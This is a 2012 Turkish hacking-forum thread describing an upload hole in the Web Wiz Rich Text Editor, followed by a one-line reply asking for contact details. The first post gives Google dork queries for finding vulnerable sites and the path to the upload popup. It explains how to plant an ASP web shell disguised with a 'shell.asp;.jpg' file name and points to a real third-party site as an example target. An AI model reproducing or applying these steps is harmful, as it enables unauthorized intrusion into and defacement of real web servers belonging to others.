İPUCU

Web & Server Güvenliği Doğru web ve veritabanı sunucusu güvenliği sağlanmadan, bilgisayar korsanları hassas verilerinize erişebilir. Web, Sunucu ve veritabanı güvenliğini nasıl sağlayacağınızı buradan öğrenebilirsiniz.

Seçenekler

Webwiz RTE Açığı

15-06-2012 11:21
#1
ByBela1 - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
02/2012
Nereden:
THT
Mesajlar:
1.406
Teşekkür (Etti):
99
Teşekkür (Aldı):
186
Konular:
152
Ticaret:
(0) %
Google Dorks:
inurl:rte/my_********s/my_files/
inurl:/my_********s/my_files/

Exploit: site.com/rte/RTE_popup_file_atch.asp

Örnek:
Siteleri arattık rte uzantısı şu şekil çıktı; Hacked_bY_iLLuminate_d3moN şimdi sitenin sonuna upload linkini yapıştırıcaz;

Attach File Properties

açılan sitede jpg shell imizi upload ediyoruz shell.asp;.jpg sonra upload linkimizin olduğu yere gidiyoruz. o dizinde /my_********s/my_files/ burası oluyor.

http://www.jrf.org.tw/newjrf/rte/my_...677_x.asp;.jpg
Kullanıcı İmzası
Benim Sadık Yarim Kara Topraktır

09-09-2012 11:40
#2
devidazim - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
06/2012
Mesajlar:
14
Teşekkür (Etti):
0
Teşekkür (Aldı):
0
Konular:
1
Ticaret:
(0) %
kardes bı ıletısıma dresınıı werırımsn
Kullanıcı İmzası
:inv

Bookmarks


« Önceki Konu | Sonraki Konu »
Seçenekler

Yetkileriniz
Sizin Yeni Konu Acma Yetkiniz var yok
You may not post replies
Sizin eklenti yükleme yetkiniz yok
You may not edit your posts

BB code is Açık
Smileler Açık
[IMG] Kodları Açık
HTML-Kodları Kapalı
Trackbacks are Kapalı
Pingbacks are Kapalı
Refbacks are Kapalı